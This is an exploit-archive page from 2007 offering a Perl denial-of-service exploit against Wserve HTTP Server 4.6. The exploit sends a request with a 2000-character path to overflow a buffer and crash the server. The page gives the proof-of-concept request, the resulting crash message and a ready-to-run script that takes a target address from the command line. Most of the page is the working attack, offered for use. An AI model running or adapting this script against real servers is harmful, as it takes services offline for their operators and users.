[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit
# Published : 2007-04-05
# Author : WiLdBoY
# Previous Title : MS Windows Explorer Unspecified .ANI File Denial of Service Exploit
# Next Title : IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0rn /127.0.0.1:80/AAAAAA[2000].
# Error :
# Buffer Overrun Detected!
# Program:...~TempRar$EX00.906wservewserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue
# execution and must now be terminated
# Exploit :
use LWP::UserAgent;
$unique = LWP::UserAgent->new;
$address = shift or die("Insert A Target");
$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);
$res = $unique->request($req);
print $res->as_string;
# Tested :
# --- Wserve HTTP Server 4.6 ---
# Vulnerable :
# --- Wserve HTTP Server 4.6 ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# www.Syue.com [2007-04-05]